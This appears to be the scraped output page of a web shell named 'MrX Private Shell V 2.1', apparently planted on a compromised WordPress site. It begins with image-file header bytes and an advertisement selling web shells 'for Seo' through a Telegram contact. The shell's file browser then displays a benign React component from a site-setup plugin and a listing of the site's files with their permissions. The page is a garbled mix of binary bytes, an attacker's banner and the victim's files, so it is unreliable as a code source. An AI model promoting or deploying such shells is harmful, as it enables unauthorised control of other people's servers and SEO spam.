����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
import { arrowRight, Icon } from '@wordpress/icons';
import classNames from 'classnames';
export const ChoiceBox = ({
icon,
badgeLabel,
heading,
description,
buttonLabel,
buttonIcon = arrowRight,
highlight,
onClick,
}) => (
<div
className={classNames(
'flex flex-col overflow-hidden text-left text-gray-900 backdrop-blur-2xl',
highlight
? 'rounded-lg border-[3px] border-design-main sm:-mt-7'
: 'rounded-sm border border-gray-300',
)}
>
{highlight && badgeLabel && (
<span className="flex h-7 items-center justify-center bg-design-main text-sm font-medium text-design-text">
{badgeLabel}
</span>
)}
<span className="flex items-center justify-center bg-gray-100/80 py-10 text-gray-900">
<Icon fill="currentColor" icon={icon} size={40} />
</span>
<span className="flex flex-1 flex-col justify-between gap-6 border-t border-gray-300 bg-white/60 p-6">
<span className="flex flex-col gap-2">
{heading && (
<span className="text-base font-semibold leading-6">{heading}</span>
)}
<span className="text-sm leading-5 opacity-70">{description}</span>
</span>
<button
type="button"
onClick={onClick}
className={classNames(
'inline-flex w-full items-center justify-between gap-2 rounded-full px-5 py-2.5 text-sm font-medium transition focus:outline-none focus-visible:ring-1 focus-visible:ring-gray-500',
highlight
? 'border border-design-main bg-design-main text-white hover:opacity-90'
: 'border border-gray-300 bg-transparent hover:border-gray-500',
)}
>
{buttonLabel}
<Icon fill="currentColor" icon={buttonIcon} size={20} />
</button>
</span>
</div>
);
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| ChoiceBox.jsx | File | 1.64 KB | 0644 |
|
| CreatingSite.jsx | File | 4.45 KB | 0644 |
|
| DescriptionGathering.jsx | File | 10.88 KB | 0644 |
|
| ExtendifyCodeConnector.jsx | File | 2.71 KB | 0644 |
|
| Launch.jsx | File | 833 B | 0644 |
|
| Logo.jsx | File | 552 B | 0644 |
|
| MigrateChoice.jsx | File | 1.53 KB | 0644 |
|
| MovingGradients.jsx | File | 1.73 KB | 0644 |
|
| NeedsTheme.jsx | File | 846 B | 0644 |
|
| RestartLaunchModal.jsx | File | 5.17 KB | 0644 |
|
| ViewportPulse.jsx | File | 1.28 KB | 0644 |
|